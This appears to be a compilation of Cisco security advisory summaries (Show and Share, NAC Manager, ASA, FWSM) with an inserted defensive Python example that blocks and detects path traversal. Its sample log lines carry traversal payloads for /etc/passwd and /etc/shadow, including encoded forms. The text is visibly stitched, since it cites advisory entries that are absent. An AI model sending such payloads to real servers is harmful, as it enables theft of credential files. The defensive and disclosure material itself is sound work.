Successful exploitation of this vulnerability may allow an authenticated, remote attacker to execute arbitrary commands on the affected system with the privileges of a system administrator.
Cisco Show and Share Security Vulnerabilities
The Cisco Show and Share webcasting and video sharing application contains two vulnerabilities.
- The first vulnerability allows an unauthenticated user to access several administrative web pages.
- The second vulnerability permits an authenticated user to execute arbitrary code on the device under the privileges of the web server user account.
Vulnerable Products
These vulnerabilities affect all versions of Cisco Show and Share prior to the first fixed releases as indicated in the Software Version and Fixes section of this Cisco Security Advisory.
Details
Cisco Show and Share contains the following vulnerabilities:
- Anonymous users can access some administration pages: Several administrative web pages of the Cisco Show and Share can be accessed without prior user authentication. These include pages for accessing Encoders and Pull Configurations, Push Configurations, Video Encoding Formats, and Transcoding. This vulnerability is documented in Cisco Bug ID CSCto73758 and has been assigned CVE identifier CVE-2011-2584.
- Cisco Show and Share arbitrary code execution vulnerability: An authenticated user with privileges to upload videos could upload code that could then be executed under the privileges of the web server.
Impact
These vulnerabilities have the following impact on Cisco Show and Share:
CSCto73758: Anonymous users can access some administration pages. Several administrative web pages of the Cisco Show and Share can be accessed without prior user authentication. The administrative web pages that can be reached this way include:
- Encoders Configurations
- Push Configurations
- Video Encoding Formats
- Transcoding
CSCto69857: Cisco Show and Share arbitrary code execution vulnerability. An authenticated user may upload arbitrary code that can be executed on the appliance with the same privileges as the web server.
Directory Traversal Vulnerability in Cisco Network Admission Control Manager
Cisco Network Admission Control (NAC) Manager contains a directory traversal vulnerability that may allow an unauthenticated attacker to obtain system information.
Vulnerable Products
Only Cisco NAC Manager software versions 4.8.X are affected by this vulnerability. Cisco NAC Manager software versions 4.7.X and earlier are not affected.
Details
Cisco NAC Manager contains a directory traversal vulnerability. The management interface uses TCP port 443. An unauthenticated attacker could exploit this vulnerability to access sensitive information, including password files and system logs, that could be leveraged to launch subsequent attacks.
Impact
An unauthenticated attacker could exploit this vulnerability to access sensitive information, including password files and system logs, that could be leveraged to launch subsequent attacks.
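The UCCX, Unified Communications Manager and NAC Manager entries above all attribute their directory traversal flaws to improper validation of a path supplied in a URL. The following is an added example, not Cisco code and not tied to any Cisco product's file layout: a resolver that refuses file requests escaping a web root (including percent- and double-encoded forms), and a detector that flags traversal attempts in access-log lines. The web root `/srv/www`, the `download?file=` endpoint and the log lines are constructed assumptions.

```python
"""Added example (not Cisco code): safe path resolution plus traversal detection."""
import posixpath
import re
from urllib.parse import unquote

# Combined-log-format fields we need: client IP, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
# A ".." segment bounded by a path or query delimiter; "q4..pdf" does not match.
TRAVERSAL = re.compile(r'(?:^|[/=&?])\.\.(?:[/&?]|$)')


def fully_decode(value, max_rounds=3):
    """Percent-decode until the string stops changing.
    Returns None if it is still changing after max_rounds: nesting that deep
    is not something a legitimate client produces, so treat it as hostile."""
    for _ in range(max_rounds):
        nxt = unquote(value)
        if nxt == value:
            return value
        value = nxt
    return None


def resolve_under_root(root, requested):
    """Return the normalised absolute path for `requested` only if it stays
    inside `root`; otherwise None. A production server should additionally
    resolve symlinks with os.path.realpath before serving the file."""
    root_norm = posixpath.normpath(root)
    decoded = fully_decode(requested)
    if decoded is None or "\x00" in decoded:
        return None
    decoded = decoded.replace("\\", "/")          # treat backslash as separator
    candidate = posixpath.normpath(posixpath.join(root_norm, decoded.lstrip("/")))
    if candidate == root_norm or candidate.startswith(root_norm + "/"):
        return candidate
    return None


def is_traversal_attempt(target):
    """True if the decoded request target contains a '..' segment or a NUL."""
    decoded = fully_decode(target)
    if decoded is None:
        return True
    decoded = decoded.replace("\\", "/")
    return "\x00" in decoded or TRAVERSAL.search(decoded) is not None


def flag_traversal_requests(log_lines):
    """Return (ip, target, status) for every parseable line that looks like
    a traversal attempt, regardless of the response status."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if m and is_traversal_attempt(m.group("target")):
            hits.append((m.group("ip"), m.group("target"), m.group("status")))
    return hits


# Constructed sample log lines (not from any real system).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Dec/2011:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Dec/2011:10:00:02 +0000] "GET /app/download?file=../../../../etc/passwd HTTP/1.1" 200 1432',
    '203.0.113.7 - - [01/Dec/2011:10:00:03 +0000] "GET /app/download?file=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1432',
    '203.0.113.7 - - [01/Dec/2011:10:00:04 +0000] "GET /app/download?file=%252e%252e%252f%252e%252e%252fetc%252fshadow HTTP/1.1" 404 0',
    '198.51.100.9 - - [01/Dec/2011:10:00:05 +0000] "GET /app/download?file=reports/q4..pdf HTTP/1.1" 200 9000',
]

if __name__ == "__main__":
    for ip, target, status in flag_traversal_requests(SAMPLE_LOG):
        print(f"traversal attempt from {ip}: {target} (status {status})")
```

A 200 status on a flagged line is the one to escalate, since it suggests the server actually returned the file.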
Multiple Vulnerabilities in Cisco ASA 5500 Series Adaptive Security Appliances and Cisco Catalyst 6500 Series ASA Services Module
Cisco ASA 5500 Series Adaptive Security Appliances and Cisco Catalyst 6500 Series ASA Services Module are affected by multiple vulnerabilities as follows:
- MSN Instant Messenger (IM) Inspection Denial of Service vulnerability
- TACACS+ Authentication Bypass vulnerability
- Four SunRPC Inspection Denial of Service vulnerabilities
- Internet Locator Service (ILS) Inspection Denial of Service vulnerability
Vulnerable Products
- MSN IM Inspection Denial of Service Vulnerability: The MSN IM inspection feature of Cisco ASA 5500 Series Adaptive Security Appliances is affected by a DoS vulnerability.
- TACACS+ Authentication Bypass Vulnerability: An authentication bypass vulnerability affects the TACACS+ implementation of Cisco ASA 5500 Series Adaptive Security Appliances.
- SunRPC Inspection Denial of Service Vulnerabilities: Four DoS vulnerabilities affect the SunRPC inspection feature of Cisco ASA 5500 Series Adaptive Security Appliances.
- ILS Inspection Denial of Service Vulnerability: A DoS vulnerability affects the ILS inspection feature of Cisco ASA 5500 Series Adaptive Security Appliances.
Impact
Successful exploitation of all the DoS vulnerabilities could cause an affected device to reload. Repeated exploitation could result in a sustained DoS condition. Successful exploitation of the TACACS+ authentication bypass vulnerability could allow an attacker to bypass authentication of VPN, firewall and/or administrative sessions.
Multiple Vulnerabilities in Cisco Firewall Services Module
The Cisco Firewall Services Module (FWSM) for the Cisco Catalyst 6500 Series switches and Cisco 7600 Series routers is affected by the following vulnerabilities:
- Syslog Message Memory Corruption Denial of Service Vulnerability
- Authentication Proxy Denial of Service Vulnerability
- TACACS+ Authentication Bypass Vulnerability
- Sun Remote Procedure Call (SunRPC) Inspection Denial of Service Vulnerabilities
- Internet Locator Server (ILS) Inspection Denial of Service Vulnerability
Vulnerable Products
The Cisco FWSM for the Cisco Catalyst 6500 Series switches and Cisco 7600 Series routers is affected by multiple vulnerabilities. Affected versions of Cisco FWSM Software vary depending on the specific vulnerability. Refer to the “Software Version and Fixes” section for specific information on vulnerable versions.
Details
- Syslog Message Memory Corruption Denial of Service Vulnerability: A denial of service vulnerability exists in the implementation of one specific system log message (message ID 302015, “Built outbound UDP connection session-id for src-intf:IP/Port to dst-intf:IP/Port ARP-Incomplete”) that can cause memory corruption and lead to a lock up or crash of the Cisco FWSM in the event that that system log message needs to be generated for IPv6 traffic that has flowed through the device. The Cisco FWSM may not recover on its own and a manual reboot may be necessary to recover.
- Authentication Proxy Denial of Service Vulnerability: A denial of service vulnerability exists in some versions of Cisco FWSM Software that affects devices configured to use authentication to grant users access to the network, also known as cut-through or authentication proxy. Vulnerable configurations are those that contain the aaa authentication match or aaa authentication include commands. The vulnerability may be triggered when there is a high number of network access authentication requests.
- TACACS+ Authentication Bypass Vulnerability: An authentication bypass vulnerability exists in the TACACS+ implementation in the Cisco FWSM. Successful exploitation could allow a remote attacker to bypass TACACS+ authentication of VPN users (the Cisco FWSM only allows VPN sessions for management), firewall sessions, or administrative access to the device.
- SunRPC Inspection Denial of Service Vulnerabilities: The Cisco FWSM is affected by four vulnerabilities that may cause the device to reload during the processing of different crafted SunRPC messages when SunRPC inspection is enabled. These vulnerabilities are triggered only by transit traffic; traffic that is destined to the device does not trigger these vulnerabilities.
- ILS Inspection Denial of Service Vulnerability: The ILS inspection engine provides Network Address Translation (NAT) support for Microsoft NetMeeting, SiteServer, and Active Directory products that use Lightweight Directory Access Protocol (LDAP) to exchange directory information with an ILS server.
Impact
Successful exploitation of any of the denial of service vulnerabilities could cause an affected device to reload. Repeated exploitation could result in a sustained denial of service condition. Successful exploitation of the TACACS+ authentication bypass vulnerability could allow an attacker to bypass authentication of VPN, firewall, and/or administrative sessions.